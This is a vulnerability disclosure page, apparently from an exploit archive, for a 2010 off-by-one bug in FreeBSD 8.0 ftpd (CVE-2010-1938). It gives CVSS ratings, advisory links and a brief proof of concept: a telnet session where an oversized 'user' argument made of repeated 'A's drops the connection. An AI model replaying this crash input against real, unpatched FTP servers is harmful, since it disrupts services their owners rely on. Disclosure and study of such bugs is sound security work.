FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)

2010.05.27
Risk: High
Local: No
Remote: Yes
CWE: CWE-189


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05) # CVE-2010-1938 # FreeBSD-SA-10:05 # Credit: Maksymilian Arciemowicz and Adam Zabrocki # # http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc # http://blog.pi3.com.pl/?p=111 # PoC: Connected to localhost. Escape character is '^]'. 220 127.cx FTP server (Version 6.00LS) ready. user cx 331 Password required for cx. user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Connection closed by foreign host. - -- Best Regards, - ------------------------ pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) <cxib@securityreason.com> sub 4096g/0889FA9A 2008-08-22

References:

http://cxsecurity.com/issue/WLB-2010050285
http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top